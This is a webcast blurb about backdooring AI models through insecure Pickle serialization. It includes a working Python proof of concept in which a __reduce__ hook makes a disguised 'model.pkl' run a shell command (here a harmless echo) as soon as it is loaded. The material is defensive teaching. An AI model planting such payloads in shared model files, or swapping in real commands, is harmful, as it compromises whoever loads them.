During this webcast we will examine how AI models can be backdoored through vulnerabilities in serialization formats such as Pickle. We will highlight the risks of loading untrusted models, demonstrate real-world attack techniques, and discuss strategies for securing AI pipelines against these attacks.
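For context, the core issue is that Python's pickle format can run arbitrary code at deserialization time. The minimal sketch below (not taken from the webcast, and using only a harmless echo command) shows how an object's __reduce__ hook lets an attacker-controlled "model" file execute code the moment a victim loads it.

```python
import os
import pickle

# Sketch of the underlying risk: pickle's __reduce__ hook lets an object
# specify an arbitrary callable to invoke during deserialization.
class MaliciousPayload:
    def __reduce__(self):
        # A real attack could fetch a backdoor or tamper with model weights;
        # here it only runs a harmless echo command.
        return (os.system, ("echo 'arbitrary code executed during model load'",))

# Attacker serializes the payload as if it were a trained model.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# Victim loads the "model": the command runs immediately,
# before any model object is ever used.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```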
This webcast supports content and knowledge from SEC545: GenAI and LLM Application Security™. To learn more about this course, explore upcoming sessions, and access your FREE demo, click here.